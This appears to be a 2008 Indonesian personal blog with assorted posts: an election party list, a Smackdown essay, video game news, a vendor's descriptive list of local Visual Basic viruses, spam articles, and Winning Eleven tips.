Virus Lokal

Daftar Urut Peserta Pemilu 2008-2009

2008-07-13T07:24:00.000-07:00

Berikut nama partai dan nomor urutnya:

1. Partai Hanura
2. Partai Karya Peduli Bangsa nomor
3. Partai Pengusaha dan Pekerja Indonesia
4. Partai Peduli Rakyat Nasional
5. Partai Gerindra
6. Partai Barisan Nasional
7. Partai Keadilan dan Persatuan Indonesia
8. Partai Keadilan Sejahtera
9. Partai Amanat Nasional
10. Partai Perjuangan Indonesia Baru
11. Partai Kedaulatan
12. Partai Persatuan Daerah
13. Partai Kebangkitan Bangsa
14. Partai Pemuda Indonesia
15. Partai Nasional Indonesia Marhaenisme
16. Partai Demokrasi Pembaruan
17. Partai Karya Perjuangan
18. Partai Matahari Bangsa
19. Partai Penegak Demokrasi Indonesia
20. Partai Demokrasi Kebangsaan
21. Partai Republika Nusantara
22. Partai Pelopor
23. Partai Golongan Karya
24. Partai Persatuan Pembangunan
25. Partai Damai Sejahtera
26. Partai Nasional Benteng Kerakyatan Indonesia
27. Partai Bulan Bintang
28. Partai Demokrasi Indonesia Perjuangan
29. Partai Bintang Reformasi
30. Partai Patriot
31. Partai Demokrat
32. Partai Kasih Demokrasi Indonesia
33. Partai Indonesia Sejahtera
34. Partai Kebangkitan Nasional Ulama

'Smackdown' Itu Palsu?

2008-07-10T23:09:00.000-07:00

Di kala cuaca panas yang masih mendera, publik Indonesia kembali dipanaskan dengan kehebohan anak-anak yang beraksi laksana jagoan Smackdown. Ironisnya hasil yang didapat bukan lahirnya juara Smackdown baru dari Indonesia, tetapi yang terjadi malahan bertebarnya kasus patah tulang, tulang lepas sampai pada kasus terparah yaitu "kematian"! Hal ini tentunya membuat para orang dewasa, dalam hal ini khususnya adalah orang tua dan guru, yang pada awalnya adalah target market utama dari tayangan Smackdown mulai bergantian menjerit melihat putra dan anak didiknya menjadi korban aksi Smackdown antar anak-anak.

Smackdown sebenarnya adalah sebuah program hiburan wrestling yang merupakan bagian dari World Wrestling Entertainment(WWE). Tetapi karena sebegitu terkenalnya, maka seringkali orang-orang memakai istilah Smackdown untuk menyebut hiburan wrestling ini. Melihat begitu kerasnya aksi dalam smackdown ini tetapi jarang terlihat ada yang terluka, pasti akan terbesit dalam pikiran kita, "Apakah Smackdown itu palsu?"

Yang jelas bukan ide yang bagus untuk menanyakan hal ini ke pada seorang pegulat. Beberapa tahun lalu John Stossel, seorang reporter stasiun TV ABC, menanyakannya ke pegulat Dr.D(David Schultz). Tanpa berkata apa-apa Dr.D memukul bagian atas telinganya dengan sangat keras sampai diduga sejak itu pendengaran Stossel telah rusak secara permanen. Komedian Richard Belzer menanyakan hal serupa pada Hulk Hogan dan menantangnya untuk memiting kepalanya seperti yang biasa dilakukan di ajang Smackdown. Hogan melakukannya dengan kekuatan penuh. Ketika Hogan melepaskannya, Belzer jatuh ke lantai tidak sadarkan diri.

Penulis dan produser Chris Mortensen, dalam bukunya "The Unreal Story of Professional Wrestling" menyamakan smackdown ini dengan opera sabun olahraga. Sementara MacMahon lebih suka menyebutnya dengan "hiburan olahraga". Apapun sebutannya, Smackdown ini ditonton oleh 25 juta pemirsa Amerika setiap minggunya dan disaksikan 93 ribu penonton di arena. Menjadikannya tayangan ini paling banyak diminati. Tetapi kefantastisan jumlah penontonnya belum bisa menjawab pertanyaan,"Palsukah ini?"

Sekitar tahun 1950-an sudah mulai ada diskusi serius apakah smackdown ini "sungguhan" atau "palsu". Tentu saja keraguan ini pasti muncul, tetapi itu tidak akan muncul saat menyaksikan suatu pertandingan dan sama sekali tidak mengganggu keasyikan untuk menikmatinya. Seseorang yang tidak begitu suka menonton smackdown pasti akan segera memvonis bahwa semua ini adalah palsu.

Para pegulat sendiri kurang begitu suka secara serius mendiskusikan kenyataan dari smackdown. Biasanya akan selalu didapat jawaban seperti yang diberikan oleh Hulk Hogan,"Bagi yang percaya, tidak membutuhkan penjelasan apa-apa; bagi yang tidak percaya, tidak akan ada penjelasan yang cukup untuk menjawabnya".

Namun smackdown bukan hanya suatu masalah kepercayaan. Sesuatu benar-benar nyata terjadi di dalam ring. Terlihat dengan jelas semuanya yang terlihat terjadi dalam satu pertandingan memang benar-benar terjadi, polisi bisa dipanggil karena seseorang mungkin saja terluka parah atau terbunuh.

Ketika seorang berbobot 140kg melompat dari atas tali ring ke atas lawannya yang terbaring di atas kanvas, hal tersebut tentu menghasilkan sesuatu paling tidak, banyak tulang rusuk yang patah. Kecuali jika tentu saja si pelompat melakukannya tetapi berusaha tidak melukai lawannya dengan tidak benar-benar mendarat di atasnya atau dengan mendarat dengan suatu cara sendiri dimana lutut, siku dan bagian keras lainnya tidak menimbulkan efek yang serius. Hasil dari lompatan tetap menyakitkan, tetapi tidak mematikan atau berbahaya.

Jika seorang pegulat dipukul dan ditendangi dengan keras berulang kali, dia tidak akan bisa bangun dari kanvas dan melakukan hal yang sama ke lawannya, kecuali pukulan dan tendangan itu ditahan sedemikian rupa sehingga tidak begitu keras. Tidak satupun juga yang bisa berdiri setelah dipukul dengan keji pada bagian belakang kepala dengan kursi lipat besi, kecuali tidak benar-benar dipukul di bagian kepala tetapi hanya melewati punggung dan kursi tidak diayunkan begitu keras seperti yang terlihat. Pukulannya tetap akan menyakitkan tetapi tidak mematikan.

Gerakan seperti pukulan dengan lengan bawah sangat terkenal, karena bisa terlihat begitu dasyat namun tidak menimbulkan cedera pada lawan. Sebuah cengkeraman yang dilakukan oleh pegulat yang kuat, akan dengan mudah mematahkan kaki lawannya. Tetapi jika pegulat yang berpengalaman tersebut tidak sungguh-sungguh menekannya, maka efek yang terjadi tidak begitu buruk seperti yang terlihat.

Apa yang terjadi di ring bukanlah suatu film aksi. Lompatan dan jatuh bukanlah dilakukan dengan trik fotografi. Pegulat tidak bisa memanggil pemain pengganti untuk menerima pukulan untuknya. Para pegulat dilatih agar nantinya tidak melukai lawannya namun tetap selalu akan ada rasa sakit dan bahaya dalam setiap pertandingan. Ada satu pemikiran bagus, semuanya mungkin dapat diatur tetapi kita tidak akan pernah dapat menipu gaya gravitasi.

Tetapi smackdown memang sudah diatur sebelumnya. Semuanya pertandingan sudah dibuatkan naskahnya sebulan sebelum diserahkan ke orang yang disebut bookers. Mereka telah menentukan siapa yang akan memenangkan pertandingan dan siapa yang menjadi The Face(pegulat baik) dan Hell(pegulat jahat). Semuanya sudah diatur kecuali ada pertunjukan yang dinamakan shoot(pertandingan sebenarnya), tetapi sekarang sudah tidak pernah diadakan lagi. Ketika pegulat berdarah mereka melakukannya dengan menyayat dirinya sendiri dengan silet kecil. Juga diketahui, pegulat sebelum pertandingan meminum aspirin untuk membuat darah mereka lebih encer sehingga akan menimbulkan efek luka yang besar.

Kadang-kadang ada cedera yang direkayasa dengan tujuan untuk memberikan waktu kepada pegulat untuk melakukan pertandingan ulang. Tetapi tentu saja ada cedera yang benar-benar terjadi seperti Sid yang mengalami patah kaki dan bahkan juga ada yang mengalami kematian seperti yang dialami ayah dari Ted DiBiase yang mengalami serangan jantung saat bertanding.

Disebut palsu atau tidak, para pegulat ini haruslah orang yang mempunyai fisik kuat dan mempunyai pengalaman sebagai pegulat amatir atau sekolahan. Pegulat mendapat kerja yang berat yaitu menjadi seorang atlet, pemain akrobat, pemeran pengganti dan aktor. Mereka juga harus bisa cepat pulih dari cedera dan menyembunyikannya dari perhatian penonton.

Seorang pegulat yang bagus adalah seseorang yang dapat membuat pukulan dan cengkeramannya terlihat lebih mematikan dari yang sebenarnya tetapi tetap tidak membahayakan lawannya. Menutup pemikiran ini ada satu pendapat bagus dari kolom koran New York Daily, untuk pertanyaan klasik "Smackdown itu palsu?". Dia menjawab dengan pertanyaan pula,"Apakah Sinterklas, kelinci Paskah atau Great Pumpkin itu nyata?" Tentu saja! Mereka semua ada dan begitu juga smackdown!

Ini Dia 10 Video Game Terlaris Versi Forbes!

2008-07-10T23:06:00.000-07:00

BERITA - internet-web.infogue.com - Ada banyak video game yang beredar di pasaran. Penasaran ingin tahu video game apa saja yang paling laris?

Forbes bekerja sama dengan NPD, yakni perusahaan yang mengamati pasar video game dan memberikan laporan bulanan tentang data penjualan, melansir daftar 10 besar video game terlaris untuk pasar Amerika Utara.

Dikutip detikINET dari Softpedia, Selasa (10/6/2008), dalam menentukan video game terlaris, mereka tidak membedakan berdasarkan platform. Game yang dirilis dalam beberapa platform, perhitungannya dijadikan satu. Misalnya, varian game untuk konsol Xbox 360 digabung dengan penjualan untuk versi PC.

Berikut daftar 10 besar video game terlaris versi Forbes:

1. Grand Theft Auto: San Andreas (Rockstar Games-PS2, Xbox-2004). Game kontroversial yang sarat dengan adegan kekerasan ini ternyata banyak diminati kalangan gamer, dan laris terjual lebih dari 9,4 juta kopi.

2. Guitar Hero 3 (Activision - PlayStation 2, PlayStation 3, Wii, Xbox 360-2007), terjual 8,2 juta kopi.

3. Madden NFL 07 (EA Sports - PlayStation 2, PlayStation 3, Xbox, Xbox 360, GameCube, Wii - 2006), terjual 7,7 juta kopi.

4. Grand Theft Auto: Vice City (Rockstar Games - PlayStation 2, Xbox-2002), terjual 7,3 juta.

5. Madden NFL 06 (EA Sports - PlayStation 2, Xbox, Xbox 360, GameCube-2005) laku terjual 6,7 juta kopi.

6. Halo 2 (Microsoft Game Studios - Xbox - 2004), terjual 6,61 juta kopi.

7. Madden NFL 08 (EA Sports - PlayStation 2, PlayStation 3, Xbox, Xbox 360, GameCube, Wii - 2007), terjual 6,6 juta kopi.

8. Call of Duty 4 (Activision - PlayStation 3, Xbox 360 - 2007), terjual 6,25 juta kopi.

9. Grand Theft Auto 3 (Rockstar Games - PlayStation 2, Xbox - 2001),laku terjual 6,2 juta kopi

10. Madden NFL 2005 (EA Sports - PlayStation 2, Xbox, GameCube - 2004), terjual 6,1 juta kopi.

Dari data di atas dapat dilihat bahwa ternyata para gamer menyukai game-game yang cepat dan bisa memacu adrenalin, seperti olahraga, perang atau band.

Guitar Hero Dikecam Gara-Gara 'Setan'

2008-07-10T23:02:00.000-07:00

Guitar Hero III (activision)

Jakarta - Video game populer 'Guitar Hero III: Legends of Rock' mendapat sambutan meriah dari penggemarnya. Namun tak urung, cercaan akhirnya datang juga.

Adalah pemusik Amerika Serikat, Charlie Daniels, yang melayangkan protes terhadap produsen game Guitar Hero terbaru itu, Activision. Pasalnya dalam game ini, lagu ciptaannya dinilai telah disalahgunakan.

Untuk diketahui, Daniel adalah pencipta lagu 'The Devil Went Down to Georgia' yang disertakan dalam game Guitar Hero versi teranyar itu.

Lagu tersebut jadi latar pertarungan antara karakter pemain dengan karakter 'devil' atau 'setan' dalam game. Yang membuat Daniels gundah, karakter 'setan' ini dinilainya sangat sering memenangkan pertarungan adu musik.

"Lagu tersebut maksudnya untuk menggambarkan bahwa setan selalu kalah. Namun di Guitar Hero III, setan bertanduk ini malah sering sekali menang dalam kontes gitar sehingga tak sesuai dengan esensi lagu," demikian pernyataan kecaman Daniels dalam situsnya seperti dikutip detikINET dari GamesRadar, Rabu (9/4/2008).

Daniels pun menyarankan agar orang tua mengawasi anaknya saat main Guitar Hero III. Pasalnya Daniels juga menilai, penggambaran eksplisit karakter 'setan' dalam game tersebut bisa meracuni jiwa anak. Tentu saja, pendapat Daniel ini dapat diperdebatkan kebenarannya.

Daftar Virus Lokal dengan Aksi Paling Ganas

2008-07-10T22:59:00.000-07:00

Ilustrasi (ist.)

Jakarta - Virus-virus lokal banyak bermunculan, dan dibuat dengan bahasa pemrograman Visual Basic.

Spesialis antivirus dari perusahaan PT Vaksincom Alfons Tanujaya menilai, para pembuat virus cukup kreatif dengan membuat terobosan-terobosan yang mampu menutupi kelemahan virus yang dibuat dengan Visual Basic.

Berdasarkan data dari PT Vaksincom, berikut adalah daftar virus lokal dengan aksi paling ganas pada kuartal pertama tahun 2007:

- Babon, 49 KB, mengubah properties dan AM/PM pada jam menjadi tulisan Babon.

- Aksika (4k51k4), 45 KB, membuat backup MSVBVM60.DLL. disable System Restore, aktif di normal mode, Safemode dan Safemode with Command Prompt.

- Coolface, 78 KB, virus Bangka yang ditulis dalam bahasa C++ dan berusaha membasmi semua virus Visual Basic dengan menghapus file MSVBVM60.DLL.

- KillAV, 22 KB, menyembunyikan semua file MS word dan mengganti dengan dirinya.

- Pendekar Blank, 34 KB, menyembunyikan folder C:\Windows\System32 dan membuat file duplikat sesuai dengan nama folder yang disembunyikan [system32.exe], membackup MSVBVM60.dll di C:\WINDOWS\system32\dllChache, manipulasi file .com dan .txt sehingga setiap kali dijalankan akan menjalankan virus.

- Pacaran, 59 KB, mengubah ikon file "non virus" (MP3, txt, reg file, jpeg, inf dan exe) di komputer korban menjadi folder dan tipe file application sehingga pengguna komputer mengira itu adalah virus dan menghapusnya. Aksi lainnya virus ini memanipulasi Host file, menyembunyikan drive dan folder, mengubah tipe file "File Folder", MP3, JPEG menjadi W32.Pacaran.

- Blue Fantasy, 40 KB, otomatis menginfeksi dari Flash Disk, menyembunyikan folder dan menggantikan dengan file virus duplikat dengan ikon folder.

Lebih lanjut Alfons mengungkap, virus-virus yang dibuat dengan bahasa pemrograman Visual Basic memiliki beberapa ciri khas dan kelemahan sehingga "relatif" lebih mudah dibasmi. Pembasmian akan lebih mudah jika kita mampu mengakses file utama yang diperlukan untuk menjalankan Visual Basic, yaitu MSVBVM60.DLL.

Tetapi keterbatasan ini tidak menjadikan virus lokal yang dibuat kehilangan "kesaktiannya", karena beberapa pembuat virus menyadari kelemahan bahasa Visual Basic ini.

Pembuat virus berusaha menutupi kelemahan yang ada dengan melakukan backup file MSVBVM60.DLL pada direktori lain, dan akan melakukan loading secara otomatis jika MSVBVM60.DLL dihapus.

Para programmer yang menguasai bahasa pemrograman lain menggunakan kelemahan ini untuk menyerang virus-virus yang dibuat dengan Visual Basic, yaitu dengan menghapus file MSVBVM60.DLL dalam aksinya dan menulis virusnya dalam bahasa seperti C++.

The Great S.P.A.M. Experiment

2008-07-06T23:09:00.000-07:00

Malware is known to piggyback on spam, finding entry to millions of computers at home and in the workplace. Spam is not just a nuisance, it can be dangerous without the proper software protection.

A few months ago, McAfee (News - Alert), Inc., the anti-virus and anti-malware folks, launched its global S.P.A.M. (Spammed Persistently All Month) Experiment. For 30 days a cross section of the world’s population (a group of 50 consisting of housewives, students, retirees, government officials, etc.) were given spanking clean laptops, an email address absolutely no anti-spam software, and then asked to surf the web unprotected, buy things online and register for promotional items. Then McAfee set up blogs for the participants at www.mcafeespamexperiment.com so they could describe their experiences, as McAfee tallied how much spam was arriving in each respective email mailbox.

McAfee discovered that the average web user will collect 70 spam messages each day.

The U.S. participants topped the list, with 23,233 spam emails received. In second place was Brazil with 15,856. Italy was next with 15,610, then Mexico with 12,229. The U.K. came in fifth with 11,965. Australia had 9,214, The Netherlands 6,378, Spain 5,419, France 2,597, and Germany 2,331.

Many of the bloggers noted how their systems were slowing down over time, which suggests that malware arriving in spam or websites they visited was installing itself and usingCPU power to conduct some nefarious activities – such as use the host PC to send out more spam. About 8 percent of the spam consisted of so-called ‘phishing’ emails that attempt to blatantly trick or otherwise cajole users into divulging their various usernames, passwords and account numbers.

Spam recently celebrated its 30th “anniversary”, so to speak. 30 years ago (May 3rd, 1978) to be exact, there was a great minicomputer company, now part of Hewlett Packard, called DEC (Digital Equipment Corporation). Gary Thuerk, a marketer at DEC, decided to send an email to 393 users of the ARPANET, the predecessor of the Internet. That fateful email — now considered to be the first example of spam, started off as follows: “DIGITAL WILL BE GIVING A PRODUCT PRESENTATION OF THE NEWEST MEMBERS OF THE DECSYSTEM-20 FAMILY; THE DECSYSTEM-2020, 2020T, 2060, AND 2060T.”

Thuerk apparently wasn’t familiar with the ‘Sndmsg’ email program. The email addresses inadvertently overflowed into the body of the text, resulting in not all the intended 393 recipients receiving the spammed message. That didn’t stop the one who did receive it from being incredibly angry. They claimed it was an illegal use of the ARPANET.

Recently, Adaptive Mobile (www.adaptivemobile.com), a mobile security company, marked the 30th anniversary of spam by pointing out how spammers are moving their efforts to mobile phones. A YouGov report estimates that two thirds of mobile users in the U.K. have received mobile spam or phishing attacks. In China, mobile users receive six to ten spam message a day.

It appears that spam evolves along with the technology it leverages.

unique spam

2008-07-06T23:07:00.000-07:00

Why content filtering doesn't work

Other systems rely on looking for things that are bad.

Filtering on content is a losing proposition. While it seems like a logical way to eliminate spam, it's not effective because spammers are using these filters to get around them. Content filters are constantly being improved.

How we solve the problem

The fact is, compared to the total number of email addresses, your business only communicates with a small fraction of them. There are only a small number of people that your business communicates with.

Content filtering doesn't work. Behaviorial filtering does.

If you wanted to discuss Viagra with someone by email, chances are you couldn't, because a content filter would block your message. Our system knows the difference between the people you want to talk to, and strangers, and applies different rules.

Our system revolves around a database of relationships between senders and recipients. When you send a message to someone, they are automatically whitelisted.

Configurable from domain down to address level.

There is no one way to filter mail that works for everyone.

The result

Drastic reduction in spam. Most spam comes from personal computers that have been hijacked by spammers. EMFilter virtually eliminates spam from these sources.

Drastic reduction in bandwidth usage. If you run your own filtering system, spammers are using your bandwidth. EMFilter only passes good messages to your server, eliminating wasted bandwidth.

EMFilter's servers are constantly being updated and improved.

Save your organization time and money.

14 years experience developing and operating large-scale mail services.

We also offer IMAP and QMTP services.

Your mail is backed up.

Redundant.

emvault.com

expert assistance

Spam (electronic)

2008-07-06T23:06:00.000-07:00

From Wikipedia, the free encyclopedia

Jump to: navigation, search

This article is about electronic spam. For other uses, see Spam.

An email box folder of spam messages.

Spamming is the abuse of electronic messaging systems to indiscriminately send unsolicited bulk messages. While the most widely recognized form of spam is e-mail spam, the term is applied to similar abuses in other media: instant messaging spam, Usenet newsgroup spam, Web search engine spam, spam in blogs, wiki spam, mobile phone messaging spam, Internet forum spam and junk fax transmissions.

Spamming remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, and it is difficult to hold senders accountable for their mass mailings. Because the barrier to entry is so low, spammers are numerous, and the volume of unsolicited mail has become very high. The costs, such as lost productivity and fraud, are borne by the public and by Internet service providers, which have been forced to add extra capacity to cope with the deluge. Spamming is widely reviled, and has been the subject of legislation in many jurisdictions.^{[citation needed]}

Persons who create electronic spam are called spammers.^[1]

E-mail spam

2008-07-06T23:03:00.000-07:00

From Wikipedia, the free encyclopedia

Jump to: navigation, search

An e-mail program detecting spam messages. Spammers frequently disguise their messages with obfuscated text.

E-mail spam, also known as "bulk e-mail" or "junk e-mail," is a subset of spam that involves nearly identical messages sent to numerous recipients by e-mail. A common synonym for spam is unsolicited bulk e-mail (UBE). Definitions of spam usually include the aspects that email is unsolicited and sent in bulk.^[1]^[2]^[3]^[4]^[5] "UCE" refers specifically to "unsolicited commercial e-mail."

E-mail spam slowly but exponentially grew for several decades to several billion messages a day. Spam has frustrated, confused, and annoyed e-mail users. Laws against spam have been sporadically implemented, with some being opt-out and others requiring opt in e-mail. The total volume of spam (over 100 billion emails per day as of April 2008) has leveled off slightly in recent years, and is no longer growing exponentially. The amount received by most e-mail users has decreased, mostly because of better filtering. About 80% of all spam is sent by fewer than 200 spammers.^{[citation needed]} Botnets, networks of virus-infected computers, are used to send about 80% of spam.^{[citation needed]} The cost of spam is borne mostly by the recipient, so it is a form of postage due advertising.

E-mail addresses are collected from chatrooms, websites, newsgroups, and viruses which harvest users' address books, and are sold to other spammers. Much of spam is sent to invalid e-mail addresses. ISPs have attempted to recover the cost of spam through lawsuits against spammers, although they have been mostly unsuccessful in collecting damages despite winning in court.^[6]^[7]

The word “spam”, in relation to unwanted e-mail, should not be spelled with all capitals as such spelling used in this sense might infringe on the rights of the legal copyright owner of the SPAM® brand

Winning Eleven 9 Rilis

2008-07-06T22:56:00.002-07:00

Menurut sejumlah informasi dari bisnis retail online, kabarnya Konami akan merilis World Soccer Winning Eleven 9 di Jepang pada tanggal 4 Agustus 2005. Game yang dirilis untuk konsol PlayStation 2 ini kabarnya juga akan dirilis untuk platform PC.
Salah satu fitur unggulan dari installment terbaru WE ini adalah:

Tambahan trick baru
Pergerakan karakter yang lebih dinamis
Dan tentu saja, tampilan grafis yang jauh lebih realistis

Fitur lainnya yang tak kalah menarik adalah terdapatnya dua posisi baru di layar utama, yaitu: wing back dan second top. Juga tidak ketinggalan satu tambahan musim salju di fitur cuaca. Menarik bukan?

Last but not least, WE9 ini juga akan dilengkapi dengan satu mode baru yang diberi judul “Nippon Challenge: Go for 2006,” yang memungkinkan para gamer untuk memainkan tim Jepang di dalam kejuaraan bergengsi tingkat internasional.

Beberapa trik untuk WE8:

2008-07-06T22:56:00.001-07:00

Face Goal
Berhenti dan berdiri menghadap gawang lawan sebelum bergerak menjauh dari pemain yang menjaganya. Lepaskan D-pad dan tekan atau tahan R2. (Jika kamu sudah menggunakan R2 maka cukup hanya melepaskan D-pad)
Feint
Ketika berdiri diam kamu dapat berpura-pura akan berlari. Hentikan bola dengan menahan R2 kemudian tekan 2 kali D-pad atas atau bawah.
Dash Cross 2
Menipu pemain bertahan dengan berpura-pura ingin mengumpan kemudian berlari melewatinya. Selagi berlari dengan R2 lepaskan D-pad kemudian tekan arah yang kamu inginkan.

Winning Eleven - “Fantastik Game”

2008-07-06T22:53:00.000-07:00

Tidak bisa dipungkiri lagi, Winning Eleven adalah game sport yang paling populer. Game yang menyuguhkan permainan dari olahraga yang paling populer sejagat “Sepak Bola” ini adalah game yang paling dimintai dipenjuru dunia. Mulai dari anak kecil sampai orang-orang dewasa banyak yang kerajingan game ini. Masih teringat masa sekolah dulu saya mulai menyukai game ini saat masih seri Winning Eleven 3 dan dimainkan pada konsole Play Station 1. Meski dari segi grafik masih 2D dan kasar, tetapi segi permainan game ini tergolong paling bagus.

Game ini diproduksi oleh produsen game terkenal di Jepang, yaitu Konami dan sosok dibalik kesuksesan WE adalah Shingo “Seabass” Takatsuka yang merupakan produser game WE.

Entah bagaimana dimainkan dalam versi konsole lain, karena saya memainkan WE hanya pada konsole PS saja. Dan perlu diketahui, saya termasuk jago dalam memainkan permainan ini. Klub andalan saya masih tetap mulai dari WE3 sampai dengan versi terbaru WE8 adalah ACMilan. Ndoweh, Iqbal, Soni dan masih banyak teman-teman lainnya adalah beberapa korban dari kelincahan jari jemariku dalam mengolah permainan ini … hehhe .

Versi Winning Eleven

Winning Eleven 3 :
Versi ini adalah versi WE yang pertama kali aku mainkan dan aku kenal. Entah untuk versi 1 dan 2, saya sampai sekarang belum pernah menemukannya. Grafiknya masih sederhana dalam bentuk 2D dan hanya memainkan kesebelasan timnas saja, belum terdapat pilihan klub untuk dimainkan. Negara andalan saya saat itu adalah Argentina dengan Gabriel Omar Batistuta sebagai striker andalannya. Sayang timnas Indonesia tidak masuk dalam daftar.

Winning Eleven 4 :
Inilah versi WE terbaik dalam konsole PS. Dalam versi ini kita masih hanya menampilkan timnas, tetapi kita juga bisa memainkan klub-klub pada fitur Master League. Disini kita juga bisa melakukan transfer pemain. Versi ini tergolong sukses dengan grafik semi 3D. Mungkin pada versi inilah WE menjadi booming. Kemudian keluar versi WE4 format Klub dan sangat beragam sekali versi bajakannya, sampai-sampai ada versi Liga Bank Mandiri.

Winning Eleven 5 :
Versi pertama yang dimainkan pada konsole PS2. Sudah tidak diragukan lagi, pasti lebih bagus dari versi-versi sebelumnya. Fitur untuk versi ini pun juga beragam sekali dan kita juga bisa memainkan. Kita bisa memainkan klub-klub dari liga Eropa sampai dengan klub dari Amerika Latin. Untuk fitur Master Leage lebih dikembangkan lagi pilihan Liga-liga Eropa untuk dimainkan, seperti Liga Itali, Liga Spanyol, Liga Inggris dll. Untuk fitur timnas kita juga bisa meminkan Piala Dunia ataupun Piala Eropa.

Winning Eleven 6 :
Versi ini adalah perkembangan dari versi sebelumnya, fitur-fiturnya nyaris sama, hanya dari segi grafik permainan lebih nyata dan sulit. Terus terang kalau menurut saya versi ini kurang menyenangkan untuk dimainkan.

Winning Eleven 7 :
Perkembangan dari versi 6. Dengan lebih mempermudah kontrol permainannya. Untuk fiturnya terus terang saya kurang begitu tahu banyak karena saya hampir tidak pernah memainkanya sendiri. Memainkan game WE dengan teman pasti akan lebih seru daripada memainkannya sendiri. Mengolah taktik dan strategi, so pasti

Winning Eleven 8 :
Ini adalah versi yang sekarang banyak dimainkan. Versi terbaik yang pernah dirilis. Grafik 3D yang lebih halus dan kontrol permainan yang menyenangkan. Kita bisa menemukan beberapa hal baru dalam permainan ini dan banyak sekali trik yang bisa dilakukan. Winning Eleven 8 hampir menyerupai simulasi sepakbola dan terlihat sangat familiar dengan pertandingan yang sesungguhnya. Kamu akan melihat mode yang terlihat mirip, pemain-pemain terbaik yang juga bisa kamu temui di game bola ini. Pada training mode terdapat kesempatan untuk berlatih menendang, ini berguna untuk latihan menghadapi pertandingan. Disana ada latihan tendangan bebas, latihan situasi dan latihan untuk pemula. Di Master League kamu bisa membentuk sebuah team sepak bola. Pemain game bisa memilih format permainan, strategi dan segala yang berhubungan dengan pengaturan pemain dan pertandingan. Di Cup version ada 6 pilihan yang bisa kamu ambil disini. Termasuk international cup yang terdiri dari 32 tim yang terdaftar dalam World Cup. Dan banyak yang bisa kamu kreasikan sendiri yaitu pemain, tim, stadion dan nama liga bisa diganti dan juga bisa membuat liga kita sendiri. Pemain dalam game itu bisa diganti namanya, nomernya, dan juga fisiknya termasuk rambut, wajah, aksesoris bahkan animasi saat dia melakukan gol dan juga kemampuannya. Seragam kostum juga bisa kita buat sendiri. WE8 membuat gamer lebih mudah untuk menciptakan pemain sesuai dengan keinginannya. Masih, klub andalan saya tetap ACMilan. Forza Milan.

Best Tips dan Trik Bermain Winning Eleven (Play Station 2) Untuk Pemula: Cara Bertahan

2008-07-06T22:52:00.000-07:00

Disini saya ingin sekedar memberikan sesuatu yang telah saya pelajari sewaktu saya bermain playstation khusunya winning eleven. Perlu diketahu ada dua versi (yang saya ketahui) winning eleven yang beredar saat ini untuk PS 2, yaitu versi yang dengan nama 10 atau 11 pangkat x serta versi lama yang sekarang sudah mencapai 150 lebih. Bagi pecinta Winnning Eleven pasti sudah mengetahui perbedaan nyata dari kedua winning ini. Baik dari aspek visual maupun dari aspek program permainannya.

Saya hanya akan membagi tips dan trik winning eleven yang versi 10 atau 11 pangkat x khususnya dalam cara bertahan menghadapi serangan lawan. Nah berikut ini beberapa trik yang telah saya ketahui.

Pertama-tama tentunya anda harus mengenal masing-masing karakter dari pemain anda yang masuk kedalam draf permainan. Speednya berapa, tingginya berapa, dan sebaginya. Layaknya pertandingan sesungguhnya winning eleven sangat diperngaruhi oleh kapabilitas dan kapasitas serta ability dari masing-masing individu permainan. Disini untuk tips bertahan saya akan menunjukkan suatu karakter dari program winning eleven ini. ohya untuk formasi saya sarankan pertahanan memiliki 4 pemain serta 3 pemain tengah. Terserah juga kepada anda gimana enaknya. Yang pasti tips berikut ini tidak begitu pengaruh pada soal formasi anda.

Ketika anda sedang diserang terutama jika bukan serangan balik, anda jangan melakukan pengejaran secara individual ke arah pemain lawan . Jangan menekan tombol R1 terus menerus ketika bertahan atau pengen mendekati lawan. Cukup tunggu sampai lawan datang baru anda dekati. Dan perlu diketahui pula, adalah salah atau sangat tidak tepat jika anda berusaha merebut atau bertahan dari serangan lawan hanya mengandalkan memencet tobol X secara terus menerus. Apalagi disertai memencet tombol R1. ini akan mengakibatkan pemain kita yang berada di barisan depan tidak turun ikut membantu pertahanan kita. Jadi yang perlu dilakukan adalah menunggu lawan datang atau mendekati secara biasa dan menutup pergerakannya. Jika anda sudah dekat dengan lawan anda bisa memencet tombol X untuk merebut bola dari nya. Jika skill defend pemain anda cukup baik dan body atau speednya cukup baik serta dalam kondisi prima (minimal berwana hijau, akan sangat baik jika berwarna merah) anda bisa melanjutkan memencet terus tombol X. Jika tidak dalam kondisi demikian saya sarankan lekas ganti pemain dengan memencet tombol L1.

Jika anda melakukan apa yang saya perintahkan diatas para pemain anda akan berkumpul di daerah kotak pinalty sembari bertahan. Dengan demikian pertahanan anda akan menjadi sangat rapat dan sangat sulit ditembuts. Dari pengalaman saya, hanya tendangan jarak jauhlah yang masih mungkin dilakukan oleh pemain lawan. Itupun sering terblock oleh pemain bertahan kita. Lain halnya jika anda konsentrasi mengejar pembawa bola, ini akan menyebabkan para pemain anda tercerai berai tidak karuan dan membuat pertahanan anda longgar. Satu lagi, jika mengejar seorang pemain penyerang yang telah melewati anda, cukup pencet R1 saja terus menerus dan arahkan pemain anda ke arah pemain yang dikejar tanpa disertai memencet tombol X. Cara ini akan membuat pemain bertahan anda lebih cepat berlari mengejar pemain lawan, dan tentunya perlu diwaspadai pula dimana dia akan melakukan manuver (berbelok arah, balik dan sebagainya).

Waspadai pula pemain yang memiliki offence, speed, maupun technique yang bagus, seperti ronaldinho, henry, shevcenko, dan christiano ronaldo dan sebagainya. Terutama pula jika mereka dalam kondisi prima (bertanda kuning atau merah). Biasanya amat ssulit untuk merebut bola dari pemain yang memiliki kondisi seperti ini. perlu pertahanan yang berlapis serta penerapan teknik seperti yang saya berikan diatas secara tepat. Gunakan pemain bertahan yang memiliki defend, body, maupun kondisi yang prima (kuning atau merah) untuk menghadapi pemain seperti ini.

Sekian dulu tips saya kali ini

Semoga bermanfaat

Haqiqie Suluh

PS: Untuk para Winning Eleven Mania, silahkan bertukar pikiran serta trik di kolom komentar dibawah ini. Jika anda benar benar seorang Mania Winning Eleven, jangan hanya buat kata-kata sampah atau spam, silahkan ajukan dan bagi tips serta trik keahlian Winning eleven anda disini. Seorang Mania hanya jadi Mania kambing jika tidak mau berbagi ilmu karena takut disaingi. Mania Winning harus tidak takut untuk berbagi dengan sesamanya. Jika anda takut kalah karena membagi Tips maka anda bukan seorang Mania Winning Eleven.

Salam untuk para WInning Eleven Mania

Tips n Trick Winning Eleven

2008-07-06T22:49:00.000-07:00

